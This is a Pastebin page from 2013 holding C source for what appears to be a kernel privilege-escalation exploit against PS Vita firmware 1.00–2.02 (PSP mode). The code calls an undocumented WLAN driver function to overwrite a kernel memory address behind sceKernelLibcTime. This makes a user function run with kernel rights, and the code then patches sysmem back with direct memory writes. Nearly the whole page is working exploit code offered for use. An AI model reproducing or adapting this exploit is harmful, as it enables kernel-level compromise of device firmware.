Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

It's not an kxploit for 1.00-2.02 vita firmwares :D

By: a guest on Jan 25th, 2013  |  syntax: C  |  size: 1.28 KB  |  views: 2,587  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. int sceWlanDrv_lib_B5E7B187(void);
  2. int sceWlanDrv_lib_51B0BBB8(u32, u32, u32, u32);
  3.  
  4. // Code with krights
  5. int kernel_function()
  6. {
  7.         // Repair sysmem
  8.         // why did it broke too much of memory?
  9.         _sw(0x0A003DBE, 0x8800F710); // j loc_0800F6F8 (2.02 value)
  10.         _sw(0x0200D821, 0x8800F714); // move $k1, $s0
  11.         _sw(0x3C038801, 0x8800F718); // lui $v1, 0x8801
  12.         _sw(0x8C654384, 0x8800F71C); // lw $a1, 0x4384($v1)
  13.  
  14.         //-------
  15.         // What the fuck are you doing in the kernel memory?! :D
  16.         //-------
  17.        
  18.         return 0;
  19. }
  20.  
  21. // Loading required modules (Net modules)
  22. u32 i;
  23. for(i = 1; i <= 6; i++) sceUtilityLoadModule(i + 0xFF);
  24.  
  25. // Set 0 to global variable. Just kicking global variable checking in the next function.
  26. sceWlanDrv_lib_B5E7B187();
  27. // Overwrite 0x8800F71C address (sceKernelLibcTime local argument setting).
  28. sceWlanDrv_lib_51B0BBB8(0, 0, 0, 0x8800F71C);
  29.  
  30. // Flush data cache
  31. sceKernelDcacheWritebackAll();
  32.  
  33. // Exec kernel function with vfpu enabled, thx to liquid
  34. int execute_with_vfpu_enabled(){ sceKernelLibcTime(0, (void *)((u32)kernel_function | 0x80000000)); return 0; }
  35. SceUID thid = sceKernelCreateThread("VFPU", &execute_with_vfpu_enabled, 0x18, 0x1000, PSP_THREAD_ATTR_USER | PSP_THREAD_ATTR_VFPU , NULL);
  36. sceKernelStartThread(thid, 0, NULL);
  37. sceKernelWaitThreadEnd(thid, NULL);